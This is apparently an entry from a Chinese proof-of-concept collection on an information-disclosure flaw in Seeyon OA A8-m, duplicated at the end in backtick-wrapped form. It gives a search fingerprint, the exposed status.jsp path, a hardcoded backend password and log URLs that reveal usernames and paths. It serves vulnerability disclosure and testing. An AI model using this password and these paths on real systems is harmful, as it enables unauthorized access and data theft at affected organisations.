Awesome-POC/OA产品漏洞/致远OA A8 status.jsp 信息泄露漏洞.md

# 致远OA A8 status.jsp 信息泄露漏洞

## 漏洞描述

致远OA A8-m 存在状态监控页面信息泄露，攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击

## 漏洞影响

```
致远OA A8-m
```

## 网络测绘

```
title="A8-m"
```

## 漏洞复现

访问监控页面

```
/seeyon/management/status.jsp
```

![image-20220520153340922](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201533962.png)

后台密码为 WLCCYBD@SEEYON

登录后通过如下url获得一些敏感信息

```
/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log
```

![image-20220520153355298](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201533377.png)

![image-20220520153408356](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201534420.png)

![image-20220520153422315](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201534381.png)
更新漏洞库：OA产品漏洞/ 2022-05-20 15:57:09 +08:00			`# 致远OA A8 status.jsp 信息泄露漏洞`

			`## 漏洞描述`

			`致远OA A8-m 存在状态监控页面信息泄露，攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击`

			`## 漏洞影响`

			```
			`致远OA A8-m`
			```

			`## 网络测绘`

			```
			`title="A8-m"`
			```

			`## 漏洞复现`

			`访问监控页面`

			```
			`/seeyon/management/status.jsp`
			```

			`![image-20220520153340922](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201533962.png)`

			`后台密码为 WLCCYBD@SEEYON`

			`登录后通过如下url获得一些敏感信息`

			```
			`/seeyon/management/status.jsp`
			`/seeyon/logs/login.log`
			`/seeyon/logs/v3x.log`
			```

			`![image-20220520153355298](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201533377.png)`

			`![image-20220520153408356](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201534420.png)`

			`![image-20220520153422315](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201534381.png)`